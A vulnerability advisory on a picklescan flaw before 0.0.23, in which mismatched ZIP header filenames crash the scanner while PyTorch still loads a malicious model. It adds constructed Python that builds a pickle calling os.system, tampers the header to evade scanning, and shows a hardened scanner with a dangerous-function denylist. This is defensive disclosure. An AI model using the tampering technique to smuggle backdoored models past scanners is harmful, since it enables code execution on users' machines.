mmaitre314 picklescan
- < 0.0.23
A denial-of-service vulnerability affects PickleScan versions prior to 0.0.23. A crafted ZIP archive makes PickleScan crash while it extracts and scans a PyTorch model archive (PyTorch saves models as ZIP files that contain a pickle). The attacker changes the filename stored in an entry's local file header while leaving the original filename in the archive's central directory. Python's zipfile module, which PickleScan uses to open the archive, compares the two names and raises BadZipFile when they differ, so the scan aborts before the pickle is ever inspected. PyTorch's more lenient ZIP handling does not trip over the inconsistency and loads the model anyway, so a malicious payload inside it passes the scanner undetected.
Exploiting this vulnerability crashes PickleScan and so disrupts the scanning of PyTorch models for malicious pickle files. The practical effect is scanner evasion rather than just an outage: the pickle is never examined, yet PyTorch still loads it. Backdoored models, for example ones downloaded from platforms such as Hugging Face, could therefore be loaded unscanned into environments where they can cause harm.
To reproduce the issue, create a PyTorch model that carries a malicious payload, such as a pickle whose reduce step runs a shell command, and save it. Then edit the filename in the ZIP's local file header so that it no longer matches the original filename, which stays unchanged in the central directory. When PickleScan scans the manipulated archive it crashes on the header inconsistency with BadZipFile, whereas PyTorch (torch.load) still loads the model and executes the embedded payload.
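The following Python is an added, constructed illustration; it is not code from the picklescan project or from the original advisory. It builds a minimal PyTorch-style archive around a hand-made pickle whose REDUCE step would call os.system, rewrites only the filename in that entry's local file header, and then shows the two behaviours described above: Python's zipfile refuses the entry with BadZipFile, while a reader that trusts only the central directory (a stand-in for the lenient loader; the real PyTorch reader is not reproduced) still returns the payload. The scan_archive routine shows one way a scanner can survive the trick: it reads entries through the central directory, reports the name mismatch as a finding, and inspects GLOBAL opcodes without unpickling. The function names, the DANGEROUS denylist and the sample pickle are all assumptions made for this example.

```python
import io
import pickletools
import struct
import zipfile
import zlib

LOCAL_HEADER_SIG = b"PK\x03\x04"
ENTRY = "model/data.pkl"

# Constructed sample: protocol-2 pickle whose REDUCE step would call os.system("echo pwned").
# It is only parsed with pickletools below, never passed to pickle.loads.
MALICIOUS_PICKLE = (
    b"\x80\x02"                     # PROTO 2
    b"cos\nsystem\n"                # GLOBAL os.system
    b"X\x0a\x00\x00\x00echo pwned"  # BINUNICODE "echo pwned"
    b"\x85"                         # TUPLE1
    b"R"                            # REDUCE -> os.system("echo pwned")
    b"."                            # STOP
)
# Assumed denylist for this example; picklescan maintains its own, larger list.
DANGEROUS = {("os", "system"), ("posix", "system"), ("nt", "system"),
             ("subprocess", "Popen"), ("builtins", "eval"), ("builtins", "exec")}


def build_model_zip(pickle_bytes: bytes) -> bytes:
    """Minimal PyTorch-style archive: a ZIP holding data.pkl plus a version file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(ENTRY, pickle_bytes)
        zf.writestr("model/version", b"3\n")
    return buf.getvalue()


def local_header_name(data: bytes, info: zipfile.ZipInfo):
    """(filename, offset of file data) as recorded in the entry's local file header."""
    off = info.header_offset
    if data[off:off + 4] != LOCAL_HEADER_SIG:
        raise ValueError("no local header at offset %d" % off)
    fnlen, extralen = struct.unpack("<HH", data[off + 26:off + 30])  # fixed header is 30 bytes
    name = data[off + 30:off + 30 + fnlen].decode("utf-8", "replace")
    return name, off + 30 + fnlen + extralen


def rename_in_local_header(data: bytes, old: str, new: str) -> bytes:
    """Rewrite the filename only in the local header; the central directory still says `old`.
    Same byte length, so every offset recorded in the central directory stays valid."""
    old_b, new_b = old.encode(), new.encode()
    if len(old_b) != len(new_b):
        raise ValueError("replacement must have the same byte length")
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        start = zf.getinfo(old).header_offset + 30
    return data[:start] + new_b + data[start + len(old_b):]


def tampered_archive() -> bytes:
    """The advisory's archive: central directory says data.pkl, local header says junk.pkl."""
    return rename_in_local_header(build_model_zip(MALICIOUS_PICKLE), ENTRY, "model/junk.pkl")


def strict_read(data: bytes, name: str):
    """Python's zipfile checks the local header name against the central directory
    and raises BadZipFile on mismatch; returns ("ok", bytes) or ("error", message)."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return "ok", zf.read(name)
    except zipfile.BadZipFile as exc:
        return "error", str(exc)


def lenient_read(data: bytes, name: str) -> bytes:
    """Stand-in for a loader that trusts only the central directory (offset, size, method)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        info = zf.getinfo(name)
    _, body = local_header_name(data, info)
    raw = data[body:body + info.compress_size]
    return zlib.decompress(raw, -15) if info.compress_type == zipfile.ZIP_DEFLATED else raw


def find_globals(pickle_bytes: bytes) -> list:
    """(module, name) pairs imported by GLOBAL/STACK_GLOBAL, found without unpickling.
    STACK_GLOBAL handling is simplified: it pairs the two most recent string pushes."""
    found, strings = [], []
    for op, arg, _ in pickletools.genops(pickle_bytes):
        if op.name == "GLOBAL":
            found.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2:
            found.append((strings[-2], strings[-1]))
        elif op.name in ("UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"):
            strings.append(arg)
    return found


def scan_archive(data: bytes) -> dict:
    """Scan .pkl entries via the central directory; a name mismatch becomes a finding,
    not an unhandled BadZipFile that aborts the whole scan."""
    findings = {"header_mismatch": [], "dangerous_globals": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
    for info in infos:
        header_name, _ = local_header_name(data, info)
        if header_name != info.filename:
            findings["header_mismatch"].append((info.filename, header_name))
        if info.filename.endswith(".pkl"):
            for module, name in find_globals(lenient_read(data, info.filename)):
                if (module, name) in DANGEROUS:
                    findings["dangerous_globals"].append((info.filename, module + "." + name))
    return findings


if __name__ == "__main__":
    data = tampered_archive()
    print("strict read :", strict_read(data, ENTRY)[0])                    # error
    print("lenient read:", lenient_read(data, ENTRY) == MALICIOUS_PICKLE)  # True
    print("scan        :", scan_archive(data))
```

Running the module prints that the strict read fails while the lenient read still returns the payload byte for byte, and that scan_archive reports both the header/directory mismatch and the os.system import. Two design points carry over to real scanners: read entries through the central directory so the scan cannot be aborted by a local-header edit, and treat any mismatch between the two name fields as a finding in its own right, since a legitimate archiver never produces one.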
Upgrade to PickleScan version 0.0.23 or later, which fixes this vulnerability.